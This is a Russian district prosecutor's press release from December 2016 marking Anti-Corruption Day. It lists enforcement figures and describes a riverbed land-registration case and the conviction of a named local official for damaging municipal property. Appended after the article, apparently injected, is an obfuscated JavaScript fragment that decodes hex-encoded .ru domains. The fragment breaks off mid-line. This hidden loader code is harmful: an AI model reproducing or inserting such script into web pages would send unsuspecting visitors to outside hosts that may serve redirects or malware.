9 декабря международный день борьбы с коррупцией

от 09 декабря 2016 года

Ежегодно 9 декабря отмечается международный день борьбы с коррупцией, который провозглашен Генеральной Ассамблеей ООН в связи, с чем прокуратура Новосибирского района информирует о принятых в 2016 году мерах по противодействию коррупции.

В истекшем периоде 2016 года прокуратурой Новосибирского района выявлено  нарушений законодательства о противодействии коррупции - 50, внесено представлений - 36 к дисциплинарной ответственности привлечено  - 21 лицо, принесено протестов - 10, направлено исковых заявлений в суд - 4, к административной ответственности в виде штрафа на сумму 1 000 000 рублей привлечено - 1 лицо (ч. 1 ст. 19.28 КоАП РФ).

Так, в ноябре 2016 года прокуратурой района проведена проверка соблюдения земельного законодательства при предоставлении администрацией Кудряшовского сельсовета в собственность земельного участка с кадастровым номером 54:35:001000:8.

В ходе проверки установлено, что указанный земельный участок находится на территории акватории реки Обь.

По результатам проверки 03.11.2016 прокуратурой района направлено исковое заявление в Новосибирский районный суд с требованием о признании права собственности отсутствующим и снятии указанного земельного участка отсутствующим.

В июне 2016 года прокуратурой Новосибирского района проведена проверка соблюдения администрацией Станционного сельсовета земельного законодательства и законодательства о приватизации муниципального имущества.

В ходе проверки установлено, что в результате незаконных действий Даниловой О.Л. по отчуждению муниципального имущества муниципальному образованию Станционной сельсовет причинен ущерб в размере 3 264 460 рублей 52 копейки.

По результатам проверки прокуратурой района в СО по г. Обь СУ СК РФ по Новосибирской области в порядке п. 2 ч. 2 ст. 37 УПК РФ направлено постановление для решения вопроса об уголовном преследовании, в ходе рассмотрения которого следователем СО по г. Обь СУ СК РФ по Новосибирской области в отношении Даниловой О.Л. возбуждено уголовное дело по признакам преступления, предусмотренного ч. 2 ст. 286 УК РФ.

Уголовное дело расследовано и направлено в суд.

Приговором Новосибирского районного суда Даниловой О.Л. назначено наказание в виде 2 лет лишения свободы, с лишением права занимать определенные должности или заниматься определенной деятельностью, связанную с лишением права занимать должности на государственной службе, в органах местного самоуправления сроком 2 года с отбыванием наказания в исправительной колонии общего режима.

Приговор в законную силу не вступил.

window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e